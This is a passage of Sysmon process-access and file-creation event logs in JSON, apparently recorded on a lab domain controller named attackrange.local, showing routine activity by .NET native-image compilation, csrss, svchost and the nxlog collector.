C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.638","SourceProcessGUID":"{E2A3D6B1-106B-5F25-0000-001054C00200}","SourceProcessId":"2116","SourceThreadId":"3592","SourceImage":"C:\\Program Files (x86)\\nxlog\\nxlog.exe","TargetProcessGUID":"{E2A3D6B1-1061-5F25-0000-001069980200}","TargetProcessId":"2308","TargetImage":"C:\\Users\\Public\\splunkd.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\wow64.dll+124f4|C:\\Windows\\System32\\wow64.dll+6e75|C:\\Windows\\System32\\wow64cpu.dll+1d07|C:\\Windows\\System32\\wow64.dll+1bf87|C:\\Windows\\System32\\wow64.dll+cba0|C:\\Windows\\SYSTEM32\\ntdll.dll+784ad|C:\\Windows\\SYSTEM32\\ntdll.dll+7834e|C:\\Windows\\SYSTEM32\\ntdll.dll+6f0dc(wow64)|C:\\Windows\\System32\\KERNELBASE.dll+c68f8(wow64)|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+207a0(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+139e(wow64)|C:\\Program Files (x86)\\nxlog\\modules\\extension\\xm_exec.dll+1512(wow64)|C:\\Program Files (x86)\\nxlog\\libnx-0.dll+d5e9(wow64)|C:\\Program Files (x86)\\nxlog\\nxlog.exe+6d5c|C:\\Program Files (x86)\\nxlog\\nxlog.exe+530b|C:\\Program Files (x86)\\nxlog\\libapr-1-0.dll+20c1e(wow64)|C:\\Windows\\System32\\msvcrt.dll+67326(wow64)|C:\\Windows\\System32\\msvcrt.dll+673f1(wow64)|C:\\Windows\\System32\\KERNEL32.DLL+162c4(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60969(wow64)|C:\\Windows\\SYSTEM32\\ntdll.dll+60934(wow64)","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8023,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.669\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1341-5F25-0000-0010BD940D00}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.669","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4384","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1341-5F25-0000-0010BD940D00}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8024,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.669\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 1212\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1341-5F25-0000-0010BD940D00}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.669","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"1212","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1341-5F25-0000-0010BD940D00}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8025,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.685\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1341-5F25-0000-0010BD940D00}\r\nTargetProcessId: 4920\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.685","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1341-5F25-0000-0010BD940D00}","TargetProcessId":"4920","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8026,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.716\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4456\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1341-5F25-0000-001078980D00}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.716","SourceProcessGUID":"{E2A3D6B1-12B5-5F25-0000-0010638D0900}","SourceProcessId":"4792","SourceThreadId":"4456","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{E2A3D6B1-1341-5F25-0000-001078980D00}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8027,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.716\r\nSourceProcessGUID: {E2A3D6B1-1058-5F25-0000-0010E8420000}\r\nSourceProcessId: 644\r\nSourceThreadId: 804\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {E2A3D6B1-1341-5F25-0000-001078980D00}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.716","SourceProcessGUID":"{E2A3D6B1-1058-5F25-0000-0010E8420000}","SourceProcessId":"644","SourceThreadId":"804","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{E2A3D6B1-1341-5F25-0000-001078980D00}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8028,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.731\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-1341-5F25-0000-001078980D00}\r\nTargetProcessId: 2756\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 07:01:21.731","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-1341-5F25-0000-001078980D00}","TargetProcessId":"2756","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":8029,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 07:01:21.872\r\nProcessGuid: {E2A3D6B1-1341-5F25-0000-001078980D00}\r\nProcessId: 2756\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ac4-0\\PresentationFramework.AeroLite.dll\r\nCreationUtcTime: 2020-08-01 07:01:21.872","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 07:01:21.872","ProcessGuid":"{E2A3D6B1-1341-5F25-0000-001078980D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\ac4-0\\PresentationFramework.AeroLite.dll","CreationUtcTime":"2020-08-01 07:01:21.872","EventReceivedTime":"2020-08-01 07:01:23","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 07:01:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":8030,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 07:01:21.903\r\nSourceProcessGUID: {E2A3D6B1-12B5-5F25-0000-0010638D0900}\r\nSourceProcessId: 4792\r\nSourceThreadId: 4384\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {E2A3D6B1-1304-5F25-0000-00107EB40A00}\r\nTargetProcessId: 2908\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x103801\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 